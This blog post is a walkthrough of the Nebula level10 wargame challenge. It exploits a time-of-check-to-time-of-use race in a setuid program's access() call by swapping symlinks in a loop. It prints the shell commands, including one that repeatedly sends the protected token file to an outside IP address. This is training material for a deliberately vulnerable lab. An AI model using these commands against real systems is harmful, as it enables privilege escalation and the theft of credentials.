Thursday, June 30, 2016

Exploit Exercises - nebula level10


Exploit Exercises - nebula level10


Researching on access() requirements, we find this:



Level10 dir has a file x which contains the token / password for flag10. It shouldn't be there. We need to find a way to transfer the token file.


We don’t have access to token.


We will need to exploit race conditions with access() calls used in the program code:



Checking how flag10 works normally:




Ok.

Following steps are needed to exploit access() race condition:

  1. Create a fake token file - echo fake_toke > /tmp/fake_token
  2. Create soft link of our fake_token - ln -sf /tmp/fake_token token
  3. Create soft link of real token with same name - ln -s /home/flag10/token token
  4. Eexecute 1 & 2 in a loop - while true; do ln -fs /tmp/fake_token token; ln -fs /home/flag10/token token; done
  5. Execute file transfer in a loop - while true; do /home/flag10/flag10 token 192.168.49.1; done





Token is transferred successfully. Use it to log in as flag10 and run getflag.


+++++

No comments:

Post a Comment

Disclaimer

The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.